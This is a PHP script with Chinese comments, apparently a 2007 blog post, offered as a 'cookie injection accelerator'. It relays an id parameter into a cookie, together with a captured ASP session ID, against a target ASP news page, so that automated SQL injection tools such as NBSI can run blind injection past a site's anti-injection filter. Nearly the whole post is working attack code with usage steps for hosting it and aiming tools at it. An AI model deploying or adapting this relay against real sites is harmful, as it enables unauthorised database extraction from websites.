<?php

/*

cookies 注入也加速 工具 PHP版

by 职业欠钱

最近遇到一个挂了防注入的东东,COOKIE注入可行,不过手工注入太辛苦了,便四处寻找加速工具

mika的工具依赖于SQL 错误开启的模式,而我遇到的这个是不显示错误信息的

只能够盲注了。

曾经找到一个ASP版的加速工具,其原理是将GET变量放到COOKIE里,然后调用XML去访问注入页面

将返回信息显示出来

这样的好处是可以用NBSI之类的常规注入工具进行检测

不过也许人品不好,我在用ASP版的加速工具的时候,什么也没返回

所以便有了这个简陋的PHP程序

*/

//使用方法:

//修改相关参数后,将本文件放到一个支持PHP的空间上

//把http://www.yousite.com/cookieinject.php?id=123

//填写到NBSI等注入工具中即可

error_reporting(7);

ini_set("max_execution_time",0);

$id=$_GET["id"];

$id=str_replace(" ","%20",$id);

$id=str_replace("=","%3D",$id);

/*

articleId 换成注入页面的变量

例如 http://127.0.0.1/news.asp?articleId=123

注入变量就是articleId

*/

$inject="articleId";

//session是原来的COOKIE,可以自己抓包获取

$session ="ASPSESSIONIDSCBRDARD=AAGHANMCCHBPLDNPCIMFOLPI;";

$cookie=$inject."=".$id.";".$session;

//echo $cookie;

//referer 是引用页地址,一般和目标网站相同

$referer="http://127.0.0.1/";

//url是注入页面的地址,注意这里不要再把注入变量写进去

$url="http://127.0.0.1/news.asp";

$curl=curl_init();

curl_setopt($curl,CURLOPT_HEADER,0);

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);

curl_setopt($curl,CURLOPT_REFERER,$referer);

curl_setopt($curl,CURLOPT_URL,$url);

curl_setopt($curl,CURLOPT_COOKIE,$cookie);

$content=curl_exec($curl);

//这一句是为了把图片和iframe的相对地址改为绝对地址,根据需要可以注释掉

$content=str_replace("src=\"","src=\"".$referer,$content);

echo $content;

?>
posted on 2007-12-04 10:07  %5C  阅读(656)  评论(0编辑  收藏  举报